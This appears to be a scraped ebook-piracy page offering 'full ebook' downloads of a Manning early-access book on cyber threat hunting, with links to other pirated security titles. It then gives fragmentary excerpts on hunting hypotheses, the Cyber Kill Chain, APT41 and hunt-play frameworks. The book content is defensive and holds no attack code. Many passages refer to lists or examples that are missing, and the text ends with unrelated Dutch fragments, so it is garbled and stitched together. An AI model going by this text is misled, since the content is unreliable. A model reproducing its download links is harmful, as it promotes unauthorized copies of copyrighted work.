Professional Documents
Culture Documents
Full Ebook of Cyber Threat Hunting Meap V05 Nadhem Alfardan Online PDF All Chapter
Full Ebook of Cyber Threat Hunting Meap V05 Nadhem Alfardan Online PDF All Chapter
Full Ebook of Cyber Threat Hunting Meap V05 Nadhem Alfardan Online PDF All Chapter
Nadhem Alfardan
Visit to download the full and correct content document:
https://ebookmeta.com/product/cyber-threat-hunting-meap-v05-nadhem-alfardan/
More products digital (pdf, epub, mobi) instant
download maybe you interests ...
https://ebookmeta.com/product/security-operations-center-
building-operating-and-maintaining-your-soc-1st-edition-joseph-
muniz-gary-mcintyre-nadhem-alfardan/
https://ebookmeta.com/product/cyber-threat-
intelligence-2023-edition-martin-lee/
https://ebookmeta.com/product/cyber-threat-
intelligence-2023-edition-edition-martin-lee/
https://ebookmeta.com/product/cybersecurity-and-third-party-risk-
third-party-threat-hunting-1st-edition-gregory-c-rasner/
Big Data Analytics and Intelligent Systems for Cyber
Threat Intelligence 1st Edition Yassine Maleh
https://ebookmeta.com/product/big-data-analytics-and-intelligent-
systems-for-cyber-threat-intelligence-1st-edition-yassine-maleh/
https://ebookmeta.com/product/cloud-defense-strategies-with-
azure-sentinel-hands-on-threat-hunting-in-cloud-logs-and-
services-1st-edition-marshall-copeland/
https://ebookmeta.com/product/cyber-threat-intelligence-the-no-
nonsense-guide-for-cisos-and-security-managers-1st-edition-aaron-
roberts/
https://ebookmeta.com/product/cyber-threat-intelligence-the-no-
nonsense-guide-for-cisos-and-security-managers-1st-edition-aaron-
roberts-2/
https://ebookmeta.com/product/learning-c-meap-v05-michael-
haephrat/
Cyber Threat Hunting MEAP V05
1. Copyright_2023_Manning_Publications
2. welcome
3. 1_Introduction_to_Threat_Hunting
4. 2_Building_the_Foundation_of_a_Threat_Hunting_Practice
5. 3_Your_First_Threat_Hunting_expedition
6. 4_Threat_Intelligence_for_Threat_Hunting
7. 5_Hunting_in_Clouds
8. 6_Using_Fundamental_Statistical_Constructs
9. 7_Tuning_Statistical_Logic
10. 8_Unsupervised_Machine_Learning_with_K-Means
MEAP Edition Manning Early Access Program Cyber Threat Hunting
Version 5
Throughout the book, we will be covering various data sources, data sets, and
techniques to design and conduct threat hunting. We show how hunters can
use standard searches, statistics, and machine learning as analytic techniques
to conduct threat hunt expeditions.
I first take you through the fundamentals of threat hunting, how to build a
practical threat hunting framework, and establish a maturity road for your
threat hunting program.
I then take you through the process of conducting threat hunt expeditions
using a scenario-based approach, covering different real-life topics and
scenarios. You will get the opportunity to learn and practice threat hunting
using different data sets and techniques. You will gain access to templates
and processes that I hope will be of value to your career and inspiration as a
threat hunter.
To get the best out of the book, you need to have basic knowledge and
experience in managing security controls, networking concepts, operating
systems, and performing searches in data stores.
Please let me know your thoughts in the liveBook discussion forum on what I
wrote so far and what you would like to see in the rest of the book.
Thanks again for your interest and for purchasing the MEAP. Good luck,
hunters!
Nadhem Al Fardan
In this book
Definition
Let us start with an overview of the cybersecurity threat landscape and show
why threat hunting is essential.
1.1 Cybersecurity Threat Landscape
Today's cyber threat landscape is complex, constantly evolving, and diverse.
Threat actors, ranging from organized cybercrime to state-sponsored groups,
actively improve existing attack techniques and tools and create new ones to
reliably establish and quickly move through the Cyber Kill Chain
(https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-
chain.html), starting from reconnaissance to actions on objectives.
The Cyber Kill Chain developed by Lockheed Martin, shown in Figure 1.1,
describes the set of stages that adversaries typically go through to achieve
their final objective(s). The Cyber Kill Chain consists of seven stages.
We now have some idea about the complexity of the security threat
landscape; let us dig into essential concepts of threat hunting and describe its
relevance and importance.
Advanced adversaries have shifted from using noisy attacks that trigger
security alarms to more stealthy ones that leave a small footprint and trigger
minimal alerts, if any, going unnoticed by automated detection tools.
According to a SANS published report (https://www.sans.org/webcasts/stop-
nasty-malware-pre-post-execution-review-ensilo-endpoint-security-platform-
106690), "the evolution of threats such as file-less malware, ransomware,
zero days and advanced malware, combined with security tools getting
bypassed, poses an extensional risk to enterprises."
Organizations rely on the threat hunter's skills to uncover the above threats
during threat hunt expeditions, resulting in reduced dwell time and increased
cyber resilience. The dwell time is the time between an attacker's initial
penetration of an organization's environment (threat first successful execution
time) and the point at which the organization finds out the attacker (threat
detection time).
Now that we established the need for a proactive approach to uncover cyber
security threats let us describe how to structure a threat hunt.
Hypothesis
Now that we understand what a hypothesis is, let us discuss how to come up
with one.
The threat landscape associated with the environment you try to protect
should drive what hypothesis to create and execute. Different sources
concerning threats and their relevance to the environment can assist you in
understanding the threat landscape. Threat hunters translate this
understanding to hypotheses. The following are examples of such sources:
It is the job of the threat hunter to test the hypothesis using the best resources
available at the hunter's disposal. Testing the hypothesis can start by defining
a manageable list of activities that can uncover the first set of evidence or
indicators concerning the hypothesis or guide the hunters to subsequent
searches. For example, the following activities are relevant to the previously
stated hypothesis.
Hunting for suspicious PowerShell activities could reveal the existence of the
compromise, proving the hypothesis. The successful execution of the
following may uncover evidence of compromise:
1. Hypothesis proven: the analysis of the data collected during the hunt
expedition confirms the correctness of the hypothesis. In this case, the
hunt expedition uncovered a security incident.
2. Hypothesis disproven: the analysis of the data collected during the hunt
expedition confirms the incorrectness of the hypothesis. In this case, the
hunt expedition could not uncover a security incident.
3. Inconclusive: there is still insufficient information to either prove or
disprove the hypothesis. This outcome could be due to various reasons
such as insufficient data, inappropriate tools, and scope limitations.
Failing to prove the hypothesis does not necessarily mean that the threat does
not exist. It means that the hunter could not uncover the threat with the
skillset, data, and tools available.
The book focuses on structured that hunting, in which the threat hunter,
working with other security team members to define and prove a hypothesis,
targeting adversaries' Tactics, Techniques, and Procedures (TTPs).
The organization's threat hunting maturity level should improve over time.
There are many lessons the hunter will learn from the hunt expeditions. The
book provides practical lessons on how to plan, build and operate an effective
threat hunting program.
Now we have a good idea about threat hunting; let us compare it with threat
detection, a fundamental security monitoring service, and draw differences
and highlight similarities.
SOC analysts attend to security alerts detected and reported by security tools
and perform triage and investigation of security incidents. Figure 1.2 shows
at a high level the threat detection process, in which SOC analysts would
primarily perform cyber threat farming. Like farmers, SOC analysts generally
wait for alerts (ripe crops) to show up on a dashboard to triage and respond to
(harvest and process.) On the other hand, hunting takes a proactive approach.
Hunters take the lead by going out in the hunting field to conduct
expeditions, equipped with the right mindset, experience, situational
awareness, and the right set of tools they require for an expedition.
Detection and hunting can use the same or different analytic techniques to
detect or hunt for malicious activities. For example, user behavior analytic
tools deploy statistical analysis and machine learning to detect and report
anomalous user behavior to the security monitoring team. Hunters can make
use of similar techniques for cyber threat hunting. Although hunters would
not lead the development of machine learning models, they must understand
and apprehend the capabilities and limitations of the different analytic
techniques.
Threat hunters are highly skilled resources. Let us have a look at the set of
skills that threat hunters possess.
Successful threat hunters are curious, prepared to tackle new challenges, and
equipped with a good understanding of their hunting field. As a threat hunter,
you will face challenges such as the unavailability of data, slow searches,
improper event parsing, old technologies, incomplete or not access systems.
The hunter should raise these challenges during and after a hunt expedition.
Some of these challenges might get addressed in a reasonable time, while
others might take a long time or might not get addressed at all, especially
ones that involve financial investments. These challenges should not prevent
the hunters from finding new ways to enhance the effectiveness of the threat
hunts by looking at other data and systems and tune the techniques the hunter
deploys. Hunters are resourceful.
During a hunt expedition, not being able to prove the hypothesis should not
discourage a hunter. It is a common outcome that can be due to various
reasons, including
The attack or the threat described in the hypothesis does not exist in the
first place
The Hunter might not yet have the full context about the environment.
For example, running a threat hunt against a newly deployed set of
systems and applications might prove to be challenging when running
the hunt.
The Hunter might not yet have the skill set required to uncover
sophisticated attacks against technologies that the hunter is not very
familiar with. For example, running a threat hunt expedition against a
private Kubernetes environment while the hunter is unfamiliar with
containerized deployments.
Lack of data required to the hunter to perform better investigations
The use of inappropriate techniques to uncover sophisticated attacks.
For example, running basic searches to uncover advanced persistent
threats (APTs) have their limitations.
Figure 1.3 shows in a high-level the threat hunting process, which starts by
formalizing a hypothesis, followed by trying to prove the hypothesis. If the
hunter could not prove the hypothesis, then try to improve it by updating the
hypothesis details and searching again for the threat. If proven, then the threat
has been uncovered. The hunter does not stop there; expand the scope and
search for indicators on other systems to understand the attack's magnitude
and spread. The hunter would then engage the incident response team and
document and share new content that would be helpful to the security
monitoring and threat intelligence team.
Note
Note
Now that we understand the threat hunting process let us examine the tools
used to execute the "look for threat in the environment" step.
Core technologies and tools that hunters would have in their toolset
Depending on the environment and the scope of the hunt, the hunter’s toolset
would contain other tools. For example, a hunter might use YARA rules to
research and capture suspicious activities on endpoints or push snort rules to
network security tools such as intrusion detection systems to capture network
activities of interest.
1.8 Summary
Structured threat hunting is a hypothesis-driven practice that proactively tries
to uncover threats that were not detected or threats that have been detected
but dismissed or undermined by humans. Understanding the mindset of a
threat hunter and the threat hunting process is crucial to becoming a
successful threat hunter.
2 Building the Foundation of a
Threat Hunting Practice
This chapter covers
How to develop a threat hunting hypothesis
How to document a threat hunt play
The importance of threat intelligence to threat hunting
Building a threat hunting framework
The detail of the threat hunting process
Threat hunting role and responsibilities
Important frameworks and standards
How to evaluate the maturity of a threat hunting practice
We then describe how to start a hunting practice and improve its maturity
over time, supplying you with processes and templates to kickstart the work.
We then describe the general role and responsibilities of the threat hunter
using a responsible, accountable, consulted, and informed model.
Finally, we describe data sources and their importance to threat hunting and
provide an overview of common data sources and sets such as Windows
events, Sysmon, Linux events, network flows and firewall events.
Let us start by defining essential concepts and roles that we would refer to in
this chapter and the rest of the book.
2.1 Threat Hunting Definitions
Threat hunting is a human-centric security practice that takes a
proactive approach to uncover threats that evaded detection tools such as
automated, rule- and signature-based security systems or threats that
have been detected but dismissed or undermined by humans.
A hypothesis is a proposition that is consistent with known data but has
been neither verified nor shown to be false.
A threat hunter is a role taken by a cyber security specialist who
proactively and interactively seeks to uncover attacks or threats that
evaded detection technologies deployed in various places in the
network.
Situational awareness refers to understanding the business, the
supporting technology environment and the internal and external cyber
threats associated with this environment.
A threat actor refers to a person, a group or an organization driven by
different motives to conduct malicious intents.
Now that we have defined some essential threat hunting-related concepts and
roles, let us construct our first hunt play.
Imagine the threat intelligence team sharing with you that a threat group
referred to as APT41 is now a top actor in their threat watchlist. Construct a
threat hunt play to uncover this group’s activities when using shell-based
techniques against Microsoft Active Directory (AD).
Note
This scenario considers a known threat actor that the threat intelligence team
considers relevant to the environment. There will be other cases in which the
actors and campaign are unknown, and you would rely on your experience,
data, and tools to uncover them. It takes time to build maturity, so let us start
with this scenario.
We need to create a threat hunt play, such as the example that will shortly
follow. The threat hunt play documents the following: title, reference
number, background about the organization and the hunt play, the hypothesis
that we try to test, the scope of the hunt, the techniques that we would start
with to trigger the hunt, along with the associated procedures and data
sources, and internal and external references relevant to the hunt play. Let us
look at the example.
Over time, some threat hunts might transition to security detection rules. In
addition, there will also be cases in which some hunts might become
obsolete, for example, after decommissioning an application or a system.
The following is a format that you can use to document a threat hunting play.
The format consists of the following:
In our scenario, the threat intelligence team provided the threat hunter with a
good reason to establish one or more threat hunt plays relevant to a threat
group of interest, APT41, one of many active threat actors.
"Who would attack the organization, and how?" are questions that threat
intelligence analysts try to answer. To that, they research, analyze and
compile a wide range of internal and external information to identify short-
term (present) and long-term (future) attacks and threats. Threat intelligence
analysts then share the compiled version with the broader organization,
including threat hunters.
2.3.1 Threat Intelligence Types
Let us now look into how to view and process tactical and technical threat
intelligence based on their level of complexity through the lens of the
pyramid of pain model.
A mature threat hunting practice would focus on the top three layers of the
pyramid of pain (network/host artifacts, tools and TTPs) to get the best value
out of threat intelligence and achieve higher levels of maturity. The bottom
three layers of the pyramid (hash values, IP addresses and domain names) are
associated with IOCs mainly consumed for security monitoring purposes.
Threat hunters would still use these IOCs, but that should not be the focus of
the threat hunting practice as a whole.
We all exhibited and will exhibit one form or another of cognitive biases.
Security professionals such as threat hunters should be aware of how
cognitive biases impact their decisions and judgment. There is a long list of
cognitive biases. The following are three critical ones that threat hunters
should observe and try to overcome when designing and conducting hunts.
The threat intelligence community tracks threat actors and, in many cases,
maps their activities to the MITRE ATT&CK tactics and techniques.
Organizations and threat hunters can use this information to plan their hunts.
For example, APT41 (Mandiant - https://www.mandiant.com/resources/apt-
groups) is a group that is also known as Wicked Panda (CrowdStrike -
https://adversary.crowdstrike.com/en-US/adversary/wicked-panda), Group 72
(Cisco Talos - https://blogs.cisco.com/security/talos/threat-spotlight-group-
72) and BRONZE ATLAS (SecureWorks -
https://www.secureworks.com/research/threat-profiles/bronze-atlas.)
Threat hunters can use the MITRE ATT&CK as a starting point to investigate
the group, understanding and visualizing the known techniques and
procedures that the group deploys.
Note
If identified as one of the threat actors of interest, the security monitoring and
threat hunting teams would look for APT41 tactics, techniques, and tools
commonly used by the group. Threat hunters, in particular, would establish
hypotheses around the existence of traces of APT41 activities in the network
and search for the tactics and tools used by the group to prove the hypotheses.
Including all the APT41 techniques in a single hunt play would not be
practical. Some techniques are not relevant to the environment, while others
are. You might end up combining the techniques that apply to the
environment based on the tactic they call under and procedures used. In our
threat hunt play example, we are looking into techniques in which
PowerShell has been used to execute the threat.
Building and operating a structured threat hunt practice involves more than
creating hunting plays. A framework that describes how to manage a hunting
practice is needed. Let us look into the topic of building a framework for
threat hunting.
2.7 Frameworks
In general, a framework is a structure that outlines the organization of a
system (in our case, the threat hunting practice) and facilitates the proper
arrangement of components that the framework identifies.
2.7.1 Scenario
Imagine you are asked to develop the outline of a threat hunting framework
to drive a structured threat hunting practice. What areas would the framework
cover, and what level of details would you include?
Note
The threat hunting process can be much more involving, especially the
execution phase when multiple hunters are involved in conducting and
supporting large-scale threat hunting expeditions.
III.
[Inhoud]
ZESDE HOOFDSTUK.
—Binne ’t loate?